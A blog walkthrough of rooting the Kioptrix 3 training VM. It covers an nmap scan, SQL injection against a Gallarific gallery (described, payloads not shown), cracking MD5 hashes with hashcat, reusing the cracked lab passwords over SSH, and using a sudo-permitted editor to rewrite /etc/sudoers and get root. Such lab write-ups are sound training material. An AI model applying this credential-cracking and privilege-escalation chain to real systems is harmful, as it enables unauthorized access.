Rooting Kioptrix 3 Walkthrough


Kioptrix 3 is B2R VM designed for students to practice vulnerability analysis and exploitation. Objective is to root this virtual machine by exploiting possible vulnerabilities leading to full system compromise

Vulnerabilities Exploited:

  • SQL Injection
  • Password reuse
  • Sudo Misconfiguration

Lab Setup:

  • VMWare workstation for Virtual Machines
  • Kali Linux VM in Bridge mode
  • Kioptrix 3 in Bridge mode

Tools Used:

  • Kali Linux VM
  • netdiscover
  • nmap


I used netdiscover to find ip address of target VM.


Target VM IP Address:

I modified my /etc/hosts file as guided by author of the VM.,24/

root@kali:~# cat /etc/hosts

Next, i used namp to find opened ports/services on target machine.

root@kali:~# nmap -p- -A

Starting Nmap 7.70 ( ) at 2018-05-30 00:02 EDT
Nmap scan report for
Host is up (0.00026s latency).
Not shown: 65533 closed ports
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
|   /:
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:62:9A:C5 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

1   0.26 ms

OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds

Guess what, Found a website hosted on port 80. Lets explore website in browser…

In comments, found gallery admin panel.

So, title of login page tells me that target gallery is by Gallarific Photo Gallery.


quick googling display sql injection in Gallarific Photo Gallery.


Using SQL Injection, dumped plain text admin username and password.

and logged into Gallarific Gallery


Ooops, no further proceeding this way. We can not do much with this admin panel.

Lets use sql injection to read local file system. Reading /etc/passwd, /etc/group, /etc/my.cnf is successful, but no other local configuration file is readable.

Lets check for other databases and tables using sql injection.

Found 2 default databases, with only “gallery” as user created database. Lets find tables in gallery database.

Hm… dev_accounts seems interesting table name. Lets find columns…

and dump username:password

I cracked these hashes with hashcat.


root@kali:~# hashcat -m 0 -a 0 --force  -o found1.txt  hashes.txt /root/rockyou.txt

hashcat (v4.0.1) starting...
OpenCL Platform #1: The pocl project
* Device #1: pthread-Intel(R) Core(TM) i7-3520M CPU @ 2.90GHz, 512/1493 MB allocatable, 4MCU

Hashes: 2 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash
Password length minimum: 0
Password length maximum: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastical reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

* Device #1: build_opts '-I /usr/share/hashcat/OpenCL -D VENDOR_ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=3 -D DGST_R2=2 -D DGST_R3=1 -D DGST_ELEM=4 -D KERN_TYPE=0 -D _unroll'
Dictionary cache hit:
* Filename..: /root/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
- Device #1: autotuned kernel-accel to 1024
- Device #1: autotuned kernel-loops to 1
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>
Session..........: hashcat
Status...........: Cracked
Hash.Type........: MD5
Hash.Target......: hashes.txt
Time.Started.....: Wed May 30 05:06:33 2018 (5 secs)
Time.Estimated...: Wed May 30 05:06:38 2018 (0 secs)
Guess.Base.......: File (/root/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:  3110.3 kH/s (0.68ms)
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 10838016/14344385 (75.56%)
Rejected.........: 0/10838016 (0.00%)
Restore.Point....: 10833920/14344385 (75.53%)
Candidates.#1....: MasterFlick -> March3490
HWMon.Dev.#1.....: N/A

Started: Wed May 30 05:06:32 2018
Stopped: Wed May 30 05:06:39 2018
root@kali:~# cat found1.txt

//dreg:Mast3r // dreg dont have sudo privilege,

//loneferret:starwars // loneferret have sudo privilege


root@kali:~# ssh loneferret@
loneferret@'s password:
Permission denied, please try again.
loneferret@'s password:
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
To access official Ubuntu documentation, please visit:
Last login: Wed May  9 15:35:14 2018 from

Privilege Escalation

loneferret@Kioptrix3:~$ cat CompanyPolicy.README  // company policy says, use sudo ht:)
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
loneferret@Kioptrix3:~$ sudo -l
User loneferret may run the following commands on this host:
(root) NOPASSWD: !/usr/bin/su
(root) NOPASSWD: /usr/local/bin/ht
loneferret@Kioptrix3:~$ ls -al /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$ sudo ht

Lets edit /etc/sudoers to grant loneferret sudo access

Lets confirm sudo access

loneferret@Kioptrix3:~$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/home/loneferret# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix3:/home/loneferret# whoami

and got root access!!!


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s